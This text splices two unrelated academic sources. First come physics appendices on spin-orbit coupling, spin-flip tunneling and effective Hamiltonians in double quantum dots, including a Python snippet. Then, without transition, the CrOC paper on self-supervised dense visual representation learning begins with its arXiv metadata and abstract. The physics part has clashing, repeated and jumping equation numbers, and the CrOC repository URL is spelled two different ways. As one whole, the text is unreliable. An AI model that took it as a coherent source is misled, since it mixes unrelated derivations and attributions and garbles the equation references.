\[\hat{H}_{z}=E_{z}\hat{\sigma}_{z}/2,\] (19) \[\hat{H}_{\mathrm{SO}}=\mathbf{\alpha}\cdot\hat{\mathbf{\sigma}}k. \tag{20}\] The scalar potential \(V\left(x\right)\) for the DQD exhibits two minima at \(\pm\ell\), near which the potential can be chosen as harmonic \(V_{\mathrm{osc}}\left(x\right)=\left(1/2\right)m\omega_{0}^{2}x^{2}\). In the tight-binding approximation, we first evaluate the local Hamiltonians in each dot in the eigenfunctions of the individual harmonic potentials \[|\psi_{\eta,\nu,\sigma}\rangle=|\eta,\nu\rangle|\sigma\rangle, \tag{21}\] with \(\nu\in\mathbb{N}\) labeling the eigenstates of the harmonic potential and \(\sigma\in\{\uparrow,\downarrow\}\) the spin projection along the z-axis. The orbital part \(|\eta,\nu\rangle\) of these eigenfunctions can be obtained by diagonalizing the Hamiltonian \(\hat{H}_{k}+V_{\rm osc}\left(x-\eta\ell\right)\), with \(\eta=\pm\) corresponding to the left and right dots, as appropriate, and corresponds to a Fock-Darwin function with shifted centers. Following this, around \(\eta\ell\) we can write the terms of the Hamiltonian as \[\hat{H}_{k}+V_{\rm osc}\left(x-\eta\ell\right)=\omega_{0}\left( \hat{a}^{\dagger}\hat{a}+1\right), \tag{11}\] \[\hat{H}_{e}\left(\eta\ell,t\right)=el_{0}E\left(t\right)\left(\hat {a}^{\dagger}+\hat{a}\right)+e\eta E\left(t\right)\ell,\] (12) \[\hat{H}_{\rm SO}=\frac{i}{2l_{0}}\mathbf{\alpha}\cdot\hat{\mathbf{\sigma}} \left(\hat{a}^{\dagger}-\hat{a}\right), \tag{13}\] with \(\hat{a}^{\dagger},\hat{a}\) the Fock operators of the oscillator and the Zeeman term unchanged. Moreover, we employ the characteristic oscillator length \(l_{0}=\sqrt{\omega_{0}/2m}\). 
We can separate this Hamiltonian into a part that is static in the orbital dynamics \[\hat{H}_{\eta}^{(0)}=\omega_{0}\left(\hat{a}^{\dagger}\hat{a}+1\right)+eE \left(t\right)\eta\ell+\left(E_{z}/2\right)\hat{\sigma}_{z}, \tag{14}\] and a dynamic part \[\hat{H}_{\eta}^{(1)}=el_{0}E\left(t\right)\left(\hat{a}^{\dagger}+\hat{a} \right)+\left(i/2l_{0}\right)\mathbf{\alpha}\cdot\hat{\mathbf{\sigma}}\left(\hat{a}^{ \dagger}-\hat{a}\right). \tag{15}\] When projected into the ground state, the first part reduces to the usual description of single-state QDs. However, if we project the second part as well, we will obtain an effective Hamiltonian that incorporates the action of the SOC into the ground state. We do this by first performing a SWT \(\hat{H}_{\eta}^{\prime}\left(t\right)=e^{\hat{\Upsilon}}\hat{H}_{\eta}\left(t \right)e^{-\hat{\Upsilon}}\). We further consider the adiabatic approximation with respect to the electric field, valid provided that the driving frequency is much lower than the oscillator frequency, i.e., \(\omega\ll\omega_{0}\). Then the anti-Hermitian operator \(\hat{\Upsilon}\) is given by \[\left[\hat{H}_{\eta}^{(0)},\hat{\Upsilon}\right]=\hat{H}_{\eta}^{(1)}, \tag{16}\] resulting in \[\hat{\Upsilon}=\left(f+\mathbf{d}\cdot\hat{\mathbf{\sigma}}\right)\hat{a}^{\dagger}- \left(f^{*}+\mathbf{d}^{*}\cdot\hat{\mathbf{\sigma}}\right)\hat{a}, \tag{17}\] where \[f =el_{0}E_{\eta}\left(t\right)/\omega_{0}, \tag{18}\] \[d_{x} =\frac{1}{2l_{0}}\frac{i\omega_{0}\alpha_{x}+\alpha_{y}E_{z}}{ \omega_{0}^{2}-E_{z}^{2}},\] (19) \[d_{y} =\frac{1}{2l_{0}}\frac{i\omega_{0}\alpha_{y}-\alpha_{x}E_{z}}{ \omega_{0}^{2}-E_{z}^{2}},\] (20) \[d_{z} =0. \tag{21}\] The effective action of the SOC term in the ground state is described by the Hamiltonian \[\hat{H}_{\eta}^{(2)}=\frac{1}{2}\left[\hat{\Upsilon},\hat{H}_{\eta}^{(1)}\right] =\frac{1}{2}\left\{\left[\left(f+\mathbf{d}\cdot\hat{\mathbf{\sigma}} \right),\left(el_{0}E\left(t\right)+\left(i/2l_{0}\right)\mathbf{\alpha}\cdot\hat{ \mathbf{\sigma}}\right)\right]\hat{a}^{\dagger}\hat{a}^{\dagger}\right.\] \[\quad-\left[\left(f^{*}+\mathbf{d}^{*}\cdot\hat{\mathbf{\sigma}}\right), \left(el_{0}E\left(t\right)-\left(i/2l_{0}\right)\mathbf{\alpha}\cdot\hat{\mathbf{ \sigma}}\right)\right]\hat{a}\hat{a}\] \[\quad+\left[\left(f+\mathbf{d}\cdot\hat{\mathbf{\sigma}}\right),\left(el _{0}E\left(t\right)-\left(i/2l_{0}\right)\mathbf{\alpha}\cdot\hat{\mathbf{\sigma}} \right)\right]\hat{a}^{\dagger}\hat{a}\] \[\quad+\left(el_{0}E\left(t\right)-\left(i/2l_{0}\right)\mathbf{\alpha} \cdot\hat{\mathbf{\sigma}}\right)\left(f+\mathbf{d}\cdot\hat{\mathbf{\sigma}}\right)\] \[\quad+\left(f^{*}+\mathbf{d}^{*}\cdot\hat{\mathbf{\sigma}}\right)\left(el _{0}E\left(t\right)+\left(i/2l_{0}\right)\mathbf{\alpha}\cdot\hat{\mathbf{\sigma}} \right)\right\}. \tag{22}\] The two-pair excitation processes \(\left(\propto\hat{a}\hat{a},\hat{a}^{\dagger}\hat{a}^{\dagger}\right)\) connect states that are separated in energy by \(2\omega_{0}\) and therefore can be neglected in our effective Hamiltonian approximation, while the terms \(\propto\hat{a}^{\dagger}\hat{a}\) do not contribute to the energy of the ground state. Hence, we find the following \[\hat{H}_{\eta}^{(2)}=\frac{-E_{z}||\mathbf{\alpha}||^{2}}{2l_{0}^{2}\left(\omega_{0 }^{2}-E_{z}^{2}\right)}\hat{\sigma}_{z}+\frac{E_{z}eE(t)}{\omega_{0}^{2}-E_{z} ^{2}}\mathbf{\alpha}^{\perp}\cdot\hat{\mathbf{\sigma}}. \tag{19}\] where \(\mathbf{\alpha}^{\perp}=(\alpha_{y},-\alpha_{x},0)\). 
The first term shifts the Zeeman splitting to \[\widetilde{E}_{z}=E_{z}\left(1-\frac{||\mathbf{\alpha}||^{2}}{2l_{0}^{2}\left( \omega_{0}^{2}-E_{z}^{2}\right)}\right), \tag{20}\] while the second term is the OME field that we sought. Crucially, it is oriented perpendicular to the direction of the SOC field, i.e., to \(\mathbf{\alpha}\). Note that both terms require \(E_{z}\neq 0\) to break the time-reversal symmetry. Moreover, the constant part of the electric field \(E(t)\) in the second term will rotate the spin quantization axis. However, this rotation is produced around the direction determined by \(\mathbf{\alpha}\). As shown in the following, the spin-flip amplitude is aligned in this direction and is unaffected by this rotation. The Zeeman splitting along the new quantization axis is given by \[\widetilde{E}_{z}\rightarrow\widetilde{E}_{z}\sqrt{1+\frac{e^{2}E_{0}^{2}||\bm {\alpha}||^{4}}{(\omega_{0}^{2}-E_{z}^{2})^{2}}}\approx\widetilde{E}_{z}\left( 1+\frac{e^{2}E_{0}^{2}||\mathbf{\alpha}||^{4}}{2(\omega_{0}^{2}-E_{z}^{2})^{2}} \right), \tag{21}\] with \(E_{0}\) being the constant part of the electric field. This is a next-order effect compared to the shift from \(E_{z}\) to \(\widetilde{E}_{z}\) and can be ignored. The OME term is similarly rotated, but this is also a higher-order effect, and we disregard it as well. Regarding tunneling amplitudes, we consider orthonormal Wannier functions of the ground state of each dot, defined as [66] \[|w_{\eta,\sigma}\rangle=\frac{1}{\sqrt{N}}(|\psi_{\eta,0,\sigma}\rangle+\gamma |\psi_{\bar{\eta},0,\sigma}\rangle), \tag{22}\] where \(N\equiv 1-2\gamma S+\gamma^{2}\), \(\gamma\equiv(1-\sqrt{1-S^{2}})/S\), and \(S\equiv\langle\psi_{L,0,\sigma}|\psi_{R,0,\sigma}\rangle\) is the overlap between the dot wave functions. Regardless of the particularities of \(V(x)\), we can consider a standard real-valued tunneling matrix element \(\tau_{0}\) without loss of generality. The spin-flip tunneling amplitude can be obtained as \[\tau_{\rm sf}=\langle w_{L\sigma}|\hat{H}_{\rm SO}|w_{R\sigma^{\prime}} \rangle=\frac{1-\gamma^{2}}{N}\langle\sigma|\mathbf{\alpha}\cdot\hat{\mathbf{\sigma}}| \sigma^{\prime}\rangle\langle L,0|k|R,0\rangle, \tag{23}\] with \(|\eta,0\rangle\) the ground state of the respective harmonic oscillator, as defined above. The general form of the expected value \(\langle L,0|k|R,0\rangle\) can be determined by imposing time-reversal invariance of the spin-orbit Hamiltonian, i.e., \(\mathcal{T}\hat{H}_{\rm SO}\mathcal{T}^{-1}=\hat{H}_{\rm SO}\). In the most general way, the SOC Hamiltonian, written on the basis of \(\{|L\uparrow\rangle,|L\downarrow\rangle,|R\uparrow\rangle,|R\downarrow\rangle\}\), reads as follows \[\hat{H}_{\rm SO}=\left(\begin{array}{cccc}0&0&0&\tau_{\rm sf}\\ 0&0&-\tau_{\rm sf}^{*}&0\\ 0&-\tau_{\rm sf}&0&0\\ \tau_{\rm sf}^{*}&0&0&0\end{array}\right). \tag{24}\] Taking \(\mathbf{\alpha}\) along the y-direction, as considered throughout this work, we recover a term \(\propto\hat{\tau}_{y}\hat{\sigma}_{y}\), which yields a real spin-flip matrix of the form \[\hat{H}_{\mathrm{SO}}=\left(\begin{array}{cccc}0&0&0&\tau_{\mathrm{sf}}\\ 0&0&-\tau_{\mathrm{sf}}&0\\ 0&-\tau_{\mathrm{sf}}&0&0\\ \tau_{\mathrm{sf}}&0&0&0\end{array}\right). \tag{145}\] The fact that the spin-flip tunneling term is \(\propto\hat{\tau}_{y}\) is crucial. Otherwise, the spin-flip and spin-conserving tunneling terms can interfere destructively. Consider, for instance, that the tunneling is of the form \(\propto\hat{\tau}_{x}\hat{\sigma}_{x}\). 
By performing a \(\pi/2\) rotation around the y-axis, we obtain \[\hat{H}_{\mathrm{T}}=\left(\begin{array}{cccc}0&0&-\tau_{0}+\tau_{\mathrm{ sf}}&0\\ 0&0&0&-\tau_{0}-\tau_{\mathrm{sf}}\\ -\tau_{0}+\tau_{\mathrm{sf}}&0&0&0\\ 0&-\tau_{0}-\tau_{\mathrm{sf}}&0&0\end{array}\right), \tag{146}\] which can exhibit a dark state when \(\tau_{0}=\tau_{\mathrm{sf}}\), i.e., when \(\chi=0.5\). However, if, as here, we have a term \(\propto\hat{\tau}_{y}\hat{\sigma}_{y}\), the rotation yields \[\hat{H}_{\mathrm{T}}=\left(\begin{array}{cccc}0&0&-\tau_{0}-i\tau_{\mathrm{ sf}}&0\\ 0&0&0&-\tau_{0}+i\tau_{\mathrm{sf}}\\ -\tau_{0}+i\tau_{\mathrm{sf}}&0&0&0\\ 0&-\tau_{0}-i\tau_{\mathrm{sf}}&0&0\end{array}\right), \tag{147}\] preventing destructive interference. ## Appendix B TME for arbitrary ac amplitudes In this appendix, we give the expressions for the TME terms in the time-dependent case with arbitrary ac amplitudes. After a time-dependent SWT [94], we obtain an effective Hamiltonian up to second order in the tunnel couplings, given by \[\hat{H}_{\mathrm{eff}}^{(2)}\left(t\right)=\frac{\hat{\tau}_{z}}{2}\{-\delta^{ \left(2\right)}\left(t\right)+b_{z}^{\left(2\right)}\left(t\right)\hat{\sigma }_{z}+[b_{x}^{\left(2\right)}\left(t\right)\hat{\sigma}_{x}+b_{y}^{\left(2 \right)}\left(t\right)\hat{\sigma}_{y}]\}, \tag{148}\] where the time-dependent detuning and Zeeman splittings are given by \[\delta^{\left(2\right)}\left(t\right) = \sum_{\mu,\nu}J_{\mu}\left(\frac{\epsilon_{\mathrm{ac}}}{\omega} \right)J_{\nu}\left(\frac{\epsilon_{\mathrm{ac}}}{\omega}\right)\cos[(\mu-\nu )\omega t] \tag{149}\] \[\times \left[\frac{2\tau_{0}^{2}}{\delta-\nu\omega}+\frac{\tau_{\mathrm{ sf}}^{2}}{\delta+E_{z}+\nu\omega}+\frac{\tau_{\mathrm{sf}}^{2}}{\delta-E_{z}+\nu \omega}\right],\] \[b_{z}^{\left(2\right)}\left(t\right) = \sum_{\mu,\nu}J_{\mu}\left(\frac{\epsilon_{\mathrm{ac}}}{\omega} \right)J_{\nu}\left(\frac{\epsilon_{\mathrm{ac}}}{\omega}\right)\cos[(\mu-\nu )\omega t]\] (150) \[\times \left[\frac{\tau_{\mathrm{sf}}^{2}}{\delta+E_{z}+\nu\omega}- \frac{\tau_{\mathrm{sf}}^{2}}{\delta-E_{z}+\nu\omega}\right].\] The magnetic field gradient in the perpendicular direction is given by \[b_{x}^{(2)}\left(t\right) = \sum_{\mu,\nu}J_{\mu}\left(\frac{\epsilon_{\rm ac}}{\omega}\right)J_ {\nu}\left(\frac{\epsilon_{\rm ac}}{\omega}\right)\cos[(\mu-\nu)(\omega t+\phi)] \tag{14}\] \[\times \left[\frac{\tau_{0}\tau_{\rm sf}}{\delta+E_{z}-\nu\omega}-\frac{ \tau_{0}\tau_{\rm sf}}{\delta-E_{z}-\nu\omega}\right]\] \[b_{y}^{(2)}\left(t\right) = \sum_{\mu,\nu}J_{\mu}\left(\frac{\epsilon_{\rm ac}}{\omega}\right) J_{\nu}\left(\frac{\epsilon_{\rm ac}}{\omega}\right)\sin[(\mu-\nu)(\omega t+ \phi)]\] (15) \[\times \left(\frac{2\tau_{0}\tau_{\rm sf}}{\delta-\nu\omega}-\frac{ \tau_{0}\tau_{\rm sf}}{\delta+E_{z}-\nu\omega}-\frac{\tau_{0}\tau_{\rm sf}}{ \delta-E_{z}-\nu\omega}\right).\] Note that these expressions involve two different photon numbers \(\mu\) and \(\nu\), as they are virtual second-order tunneling processes that involve two photo-assisted transitions [55, 57]. 
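These double sums are easy to evaluate numerically, which also serves as a sanity check on the expressions above. The snippet below is an illustrative sketch rather than part of the original analysis: the parameter values are assumptions (chosen only to stay away from the poles of the denominators), energies are given in units of the drive frequency \(\omega\), and the truncation \(\mu,\nu\in\{-2,\ldots,2\}\) mirrors the one used later for figure 1. Only the detuning and longitudinal terms are shown; the transverse components follow the same pattern.

```python
import numpy as np
from scipy.special import jv  # Bessel function of the first kind J_n(x)

# Illustrative (hypothetical) parameters, in units of the drive frequency omega = 1
omega, eps_ac = 1.0, 0.4
delta, Ez = 3.0, 1.5          # detuning and Zeeman splitting
tau0, tau_sf = 0.2, 0.05      # spin-conserving and spin-flip tunneling amplitudes
orders = range(-2, 3)         # truncation mu, nu = -2, ..., 2

def delta_2(t):
    """Second-order detuning term delta^(2)(t) from the double Bessel sum."""
    s = 0.0
    for mu in orders:
        for nu in orders:
            w = jv(mu, eps_ac / omega) * jv(nu, eps_ac / omega) * np.cos((mu - nu) * omega * t)
            s += w * (2 * tau0**2 / (delta - nu * omega)
                      + tau_sf**2 / (delta + Ez + nu * omega)
                      + tau_sf**2 / (delta - Ez + nu * omega))
    return s

def b_z_2(t):
    """Second-order longitudinal field b_z^(2)(t)."""
    s = 0.0
    for mu in orders:
        for nu in orders:
            w = jv(mu, eps_ac / omega) * jv(nu, eps_ac / omega) * np.cos((mu - nu) * omega * t)
            s += w * (tau_sf**2 / (delta + Ez + nu * omega)
                      - tau_sf**2 / (delta - Ez + nu * omega))
    return s

ts = np.linspace(0.0, 2 * np.pi / omega, 5)
print("delta^(2):", np.round([delta_2(t) for t in ts], 5))
print("b_z^(2):  ", np.round([b_z_2(t) for t in ts], 5))
```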
In an \(n-\)photon resonance \(E_{z}\simeq n\omega\), the Hamiltonian in the RWA is given by \[\hat{H}_{n}^{(2)}\left(t\right)=\frac{\hat{\tau}_{z}}{2}\{-\widetilde{\delta}^{(2)}+(E_{z}+\widetilde{b}_{z}^{(2)}-n\omega)\hat{\sigma}_{z}+\widetilde{b}_{n,\perp}^{(2)}[\cos(n\phi)\hat{\sigma}_{x}+\sin(n\phi)\hat{\sigma}_{y}]\}, \tag{16}\] where the diagonal terms are given by \[\widetilde{\delta}^{(2)} = \sum_{\nu}J_{\nu}^{2}\left(\frac{\epsilon_{\rm ac}}{\omega}\right)\left[\frac{2\tau_{0}^{2}}{\delta-\nu\omega}+\frac{\tau_{\rm sf}^{2}}{\delta+E_{z}+\nu\omega}+\frac{\tau_{\rm sf}^{2}}{\delta-E_{z}+\nu\omega}\right], \tag{17}\] \[\widetilde{b}_{z}^{(2)} = \sum_{\nu}J_{\nu}^{2}\left(\frac{\epsilon_{\rm ac}}{\omega}\right)\left(\frac{\tau_{\rm sf}^{2}}{\delta+E_{z}+\nu\omega}-\frac{\tau_{\rm sf}^{2}}{\delta-E_{z}+\nu\omega}\right), \tag{18}\] and the off-diagonal term has an amplitude \[\widetilde{b}_{n,\perp}^{(2)} = \sum_{\nu}J_{\nu}\left(\frac{\epsilon_{\rm ac}}{\omega}\right)J_{\nu+n}\left(\frac{\epsilon_{\rm ac}}{\omega}\right)\left(\frac{\tau_{0}\tau_{\rm sf}}{\delta-\nu\omega}-\frac{\tau_{0}\tau_{\rm sf}}{\delta-E_{z}-\nu\omega}\right) \tag{19}\] \[- \sum_{\nu}J_{\nu}\left(\frac{\epsilon_{\rm ac}}{\omega}\right)J_{\nu-n}\left(\frac{\epsilon_{\rm ac}}{\omega}\right)\left(\frac{\tau_{0}\tau_{\rm sf}}{\delta-\nu\omega}-\frac{\tau_{0}\tau_{\rm sf}}{\delta+E_{z}-\nu\omega}\right).\] In figure 1, we compare the Rabi frequency of a flopping-mode qubit obtained with the full Hamiltonian, with the results given by the effective RWA Hamiltonian shown above. To obtain numerical results, we have truncated the summations to \(\nu=-2,-1,\ldots,2\). The agreement between both results is notable, even when working with tunneling rates of \(\tau=0.2\omega\). We also compare the prediction given by the low-amplitude effective Hamiltonian shown in equation (35) of the main text. In the limit of \(\epsilon_{\rm ac}<\omega/2\) all the results coincide. ## Appendix C TME under the spin resonance condition: asymmetry in \(\delta\) To gain insight into the asymmetry in \(\delta\) discussed in section 3.1 of the main text, let us study the TME under spin resonance. That is, we consider the Hamiltonian of equation (24) in a situation where direct tunneling between the two dots is energetically disfavored. This can always be satisfied by lowering \(\tau\). Hence, since in this appendix we are concerned with a qualitative understanding of the asymmetry, we do not dwell on the precise conditions of validity and always assume a value of \(\tau\) that makes the SWT valid. Under this condition, virtual tunneling processes are dominant and we can employ a SWT to obtain an effective Hamiltonian with the leading term being of second order in the tunneling amplitudes, as done above for the flopping-mode operation in section 5 of the main text. We apply these transformations in the frame discussed in section 3.1 leading to equation (24), i.e., after applying equation (16) and equation (13), and working in the RWA. This is different from the treatment of Appendix B, where the SWT was applied before the RWA. This amounts to neglecting photo-assisted virtual tunneling processes. A complete treatment of the TME in the presence of the OME lies outside of the scope of this work. In this rotating frame, as discussed above, the \(\beta_{\mathrm{SO}}\) term has taken a role analogous to the Zeeman splitting.
Applying the transformation yields the following effective spin model for the left dot \[\hat{H}_{\mathrm{eff}}=\frac{1}{2}\left(\widetilde{E}_{z}+\widetilde{b}_{z}^{(2)}\right)\hat{\sigma}_{z}+\frac{\tilde{b}_{\perp}^{(2)}}{2}\hat{\sigma}_{x}, \tag{17}\] where the effective magnetic field is given by \[\tilde{b}_{z}^{(2)} =\frac{\widetilde{\tau}_{\downarrow}^{2}-\widetilde{\tau}_{\uparrow}^{2}}{\delta}+\frac{2\widetilde{E}_{z}\widetilde{\tau}_{\mathrm{sf}}^{2}}{\widetilde{E}_{z}^{2}-\delta^{2}}, \tag{18}\] \[\tilde{b}_{\perp}^{(2)} =\widetilde{\tau}_{\mathrm{sf}}\left(\frac{\widetilde{\tau}_{\downarrow}}{\widetilde{E}_{z}-\delta}-\frac{\widetilde{\tau}_{\uparrow}}{\widetilde{E}_{z}+\delta}-\frac{\widetilde{\tau}_{\uparrow}+\widetilde{\tau}_{\downarrow}}{\delta}\right). \tag{19}\] The term \(\widetilde{b}_{z}^{(2)}\) is non-zero in the presence of spin-dependent tunneling amplitudes \(|\widetilde{\tau}_{\downarrow}|\neq|\widetilde{\tau}_{\uparrow}|\), and a finite spin-flip tunneling rate \(\widetilde{\tau}_{\mathrm{sf}}\). The effective Hamiltonian is not symmetric (nor antisymmetric) in \(\delta\). However, it is symmetric under reflection \(\delta\to-\delta\) and \(\epsilon_{\rm ac}\to-\epsilon_{\rm ac}\). Under this reflection, the effective tunneling rates transform as \(\widetilde{\tau}_{\uparrow}\rightleftharpoons\widetilde{\tau}_{\downarrow}\), and \(\widetilde{\tau}_{\rm sf}\to-\widetilde{\tau}_{\rm sf}\) for an odd resonance \(E_{z}=(2k+1)\omega,k\in\mathds{Z}\), as discussed in section 3.1.
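As a quick illustration of this asymmetry, \(\tilde{b}_{z}^{(2)}\) and \(\tilde{b}_{\perp}^{(2)}\) can be evaluated at \(\pm\delta\) for fixed effective tunneling rates. The numerical values below are assumptions made purely for the example; in the full treatment the effective rates themselves depend on \(\delta\) and \(\epsilon_{\rm ac}\), which is what restores the combined reflection symmetry discussed above. The snippet only shows that the explicit \(\delta\)-dependence is neither even nor odd.

```python
import numpy as np

# Hypothetical effective rates and renormalized Zeeman splitting (arbitrary units)
Ez_t = 1.0                                    # E~_z
tau_up, tau_dn, tau_sf = 0.20, 0.12, 0.05

def b_z2(delta):
    return (tau_dn**2 - tau_up**2) / delta + 2 * Ez_t * tau_sf**2 / (Ez_t**2 - delta**2)

def b_perp2(delta):
    return tau_sf * (tau_dn / (Ez_t - delta) - tau_up / (Ez_t + delta) - (tau_up + tau_dn) / delta)

for d in (0.3, 0.6):
    print(f"delta = +/-{d}: b_z = {b_z2(d):+.4f} / {b_z2(-d):+.4f}, "
          f"b_perp = {b_perp2(d):+.4f} / {b_perp2(-d):+.4f}")
```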
2303.13245
CrOC: Cross-View Online Clustering for Dense Visual Representation Learning
Learning dense visual representations without labels is an arduous task and more so from scene-centric data. We propose to tackle this challenging problem by proposing a Cross-view consistency objective with an Online Clustering mechanism (CrOC) to discover and segment the semantics of the views. In the absence of hand-crafted priors, the resulting method is more generalizable and does not require a cumbersome pre-processing step. More importantly, the clustering algorithm conjointly operates on the features of both views, thereby elegantly bypassing the issue of content not represented in both views and the ambiguous matching of objects from one crop to the other. We demonstrate excellent performance on linear and unsupervised segmentation transfer tasks on various datasets and similarly for video object segmentation. Our code and pre-trained models are publicly available at https://github.com/stegmuel/CrOC.
Thomas Stegmüller, Tim Lebailly, Behzad Bozorgtabar, Tinne Tuytelaars, Jean-Philippe Thiran
2023-03-23T13:24:16Z
http://arxiv.org/abs/2303.13245v1
# CrOC : Cross-View Online Clustering for Dense Visual Representation Learning ###### Abstract Learning dense visual representations without labels is an arduous task and more so from scene-centric data. We propose to tackle this challenging problem by proposing a **C**ross-view consistency objective with an **O**nline **C**lustering mechanism (CrOC) to discover and segment the semantics of the views. In the absence of hand-crafted priors, the resulting method is more generalizable and does not require a cumbersome pre-processing step. More importantly, the clustering algorithm conjointly operates on the features of both views, thereby elegantly bypassing the issue of content not represented in both views and the ambiguous matching of objects from one crop to the other. We demonstrate excellent performance on linear and unsupervised segmentation transfer tasks on various datasets and similarly for video object segmentation. Our code and pre-trained models are publicly available at [https://github.com/stgemuel/CrOC](https://github.com/stgemuel/CrOC). + Footnote †: * denotes equal contribution. ## 1 Introduction Self-supervised learning (SSL) has gone a long and successful way since its beginning using carefully hand-crafted proxy tasks such as colorization [26], jigsaw puzzle solving [32], or image rotations prediction [14]. In recent years, a consensus seems to have been reached, and _cross-view consistency_ is used in almost all state-of-the-art (SOTA) visual SSL methods [5, 6, 7, 15, 19]. In that context, the whole training objective revolves around the consistency of representation in the presence of information-preserving transformations [7], e.g., _blurring_, _cropping_, _solarization_, etc. Although this approach is well grounded in learning image-level representations in the unrealistic scenario of _object-centric_ datasets, e.g., ImageNet [11], it cannot be trivially extended to accommodate _scene-centric_ datasets and even less to learn dense representations. Indeed, in the presence of complex scene images, the random _cropping_ operation used as image transformation loses its semantic-preserving property, as a single image can yield two crops bearing antipodean semantic content [31, 35, 36, 37]. Along the same line, it's not clear how to relate sub-regions of the image from one crop to the other, which is necessary to derive a localized supervisory signal. To address the above issue, some methods [31, 36] constrain the location of the crops based on some heuristics and using a pre-processing step. This step is either not learnable or requires the use of a pre-trained model. Alternatively, the location of the crops (_geometric pooling_[45, 51]) and/or an Figure 1: **Schematic for different categories of self-supervised learning methods for dense downstream tasks. a) Prior to the training, a pre-trained model or color-based heuristic is used to produce the clustering/matching of the whole dataset. c) The matching/clustering is identified online but restrains the domain of application of the loss to the intersection of the two views. b) Our method takes the best of both worlds, leverages online clustering, and enforces constraints on the whole spatiality of the views.** attention mechanism (_attentive pooling_[33, 42, 44, 48, 51]) can be used to infer the region of overlap in each view and only apply the consistency objective to that region (Fig. 1.c). 
A consequence of these pooling mechanisms is that only a sub-region of each view is exploited, which mislays a significant amount of the image and further questions the usage of _cropping_. There are two strategies to tackle the issue of locating and linking the objects from the two views: the first is a feature-level approach that extends the global consistency criterion to the spatial features after inferring pairs of positives through similarity bootstrapping or positional cues [2, 28, 30, 41, 48, 51]. It is unclear how much semantics a single spatial feature embeds, and this strategy can become computationally intensive. These issues motivate the emergence of the second line of work which operates at the object-level [20, 21, 43, 44, 47, 20, 43]. In that second scenario, the main difficulty lies in generating the object segmentation masks and matching objects from one view to the other. The straightforward approach is to leverage unsupervised heuristics [20] or pre-trained models [47] to generate pseudo labels prior to the training phase (Fig. 1.a), which is not an entirely data-driven approach and cannot be trivially extended to any modalities. Alternatively, [21] proposed to use K-Means and an additional global image (encompassing the two main views) to generate online pseudo labels, but this approach is computationally intensive. To address these limitations, we propose CrOC, whose underpinning mechanism is an efficient **C**ross-view **O**nline **C**lustering that conjointly generates segmentation masks for the union of both views (Fig. 1.b). Our main contributions are: 1) we propose a novel object-level self-supervised learning framework that leverages an online clustering algorithm yielding segmentation masks for the union of two image views. 2) The introduced method is inherently compatible with scene-centric datasets and does not require a pre-trained model. 3) We empirically and thoroughly demonstrate that our approach rivals or out-competes existing SOTA self-supervised methods even when pre-trained in an unfavorable setting (smaller and more complex dataset). ## 2 Related work **Global features.** The collateral effect of [7], is that it effectively uniformized the choice of the proxy task for SSL to the extent that _cross-view consistency_ is almost exclusively used. The remaining degree of freedom lies in the technique used to avoid the collapse to trivial solutions. The use of negative samples [7, 22] effectively and intuitively treats this degeneracy at the cost of using large batches, which can be mitigated by a momentum encoder [19]. At the other end of the spectrum, clustering-based approaches [4, 5, 6, 1] have shown that enforcing equipartition of the samples over a set of clusters was sufficient to palliate the collapsing issue. **Local features.** Local methods aim at completing the image-level objective by encouraging cross-view consistency at a localized level such that the resulting features are well aligned with dense downstream tasks. Broadly speaking, these methods can be categorized by the granularity at which the similarity is enforced. The first category encompasses approaches [30, 33, 41, 27], where similarity is encouraged directly at the feature level, i.e., from one feature to the other. The difficulty lies in obtaining valid pairs or groups of features. To that end, various methods [30, 41] rely solely on the similarity of the features, whereas the matching criterion of [33, 48] is driven by their distances/positions. 
[27] studies both approaches and [2] incorporates both in a single objective. The second category of methods [44, 20, 21, 20, 47] enforce consistency at a higher level, which first requires finding semantically coherent groups of features. For that purpose, [47], resort to using a pre-trained model and an offline "correspondences discovery" stage to find pairs of the region of interest. Along the same line, [20] proposes to use various heuristics prior to the training phase to generate pseudo-segmentation labels. An online version of this latest algorithm has been introduced, but it requires forwarding an additional global view. Alternatively, dense fine-tuning approaches [16, 39, 49, 51] have been proposed. These methods aim to endow models pre-trained under an image-level objective [6] with local consistency properties, but cannot be trained from scratch. Finally, MAE [18] relies on a masked autoencoder pipeline and a reconstruction objective to learn dense representations. As MAE does not rely on a cross-view consistency objective, this approach is well-suited for scene-centric datasets and of particular interest to us. ## 3 Method ### Overview This paper tackles the problem of learning dense visual representations from unlabeled scene-centric data. Recent efforts using a self-supervised multi-view consistency paradigm to address this problem rely on a two steps procedure: _i) locate_ the objects in each image view and _ii) link_ the related objects from one image view to the other. We now discuss how CrOC elegantly palliates the limitations evoked in sections 1 and 2. We observe that most of the difficulties arise because the _locate-link_ strategy treats the two image views independently. In contrast, both views stem from the same image, and their representations lie in the same space. The former observation offers the possibility to benefit from the coordinates of the cropped image regions as a cue for the _locate_ step, while the latter indicates that some operations could be performed conjointly. Consequently, we propose to depart from the typical strategy and introduce a novel paradigm dubbed _join-locate-split_, described below: **Join.** The two augmented image views, \(\tilde{\mathbf{x}}_{1}\) and \(\tilde{\mathbf{x}}_{2}\), are processed by a ViT [12] encoder \(f\) yielding the dense visual representations \(\mathbf{Z}_{\{1,2\}}\in\mathbb{R}^{N\times d}\), where \(N\) and \(d\) denote the number of spatial tokens and feature dimension, respectively. The dense visual representations are then concatenated along the token axis to obtain the joint representation, \(\mathbf{Z}_{\text{cat}}\in\mathbb{R}^{2N\times d}\). **Locate.** The objective is to find semantically coherent clusters of tokens in the joint representation space. As the quality of the input representation improves, we expect the found clusters to represent the different objects or object parts illustrated in the image. The joint representation is fed to the clustering algorithm \(\mathcal{C}\), which outputs the joint clustering assignments, \(\mathbf{Q}^{*}\in\mathbb{R}^{2N\times K}\). The soft assignments matrix \(\mathbf{Q}^{*}\) models the probability of each of the \(2N\) tokens to belong to one of the \(K\) clusters found in the joint space. **Split.** By splitting \(\mathbf{Q}^{*}\) in two along the first dimension, the assignment matrix of each view, namely \(\mathbf{Q}^{*}_{\{1,2\}}\in\mathbb{R}^{N\times K}\) are obtained. 
